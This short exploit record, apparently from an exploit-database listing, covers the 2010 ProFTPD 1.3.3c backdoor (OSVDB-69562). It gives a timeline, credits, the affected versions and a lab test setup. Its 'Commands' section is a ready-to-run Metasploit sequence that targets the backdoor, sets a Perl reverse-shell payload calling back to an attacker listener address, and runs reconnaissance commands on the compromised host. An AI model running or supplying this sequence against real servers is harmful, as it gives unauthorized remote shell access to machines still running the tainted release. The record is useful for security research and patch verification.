OSVDB-69562 : ProFTPD 1.3.3c Backdoor Command Execution

Timeline :

Public release of the backdoor presence the 2010-12-01
Metasploit PoC provided the 2010-12-02

PoC provided by :

MC
darkharper2

Reference(s) :

OSVDB-69562

Affected version(s) :

proftpd-1.3.3c from the dates of 2010-11-28 to 2010-12-02

Tested on Ubuntu 10.0.4 LTS with :

proftpd-1.3.3c patched with diff

Description :

This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 2nd December 2010.

Commands :

use exploit/unix/ftp/proftpd_133c_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a
ifconfig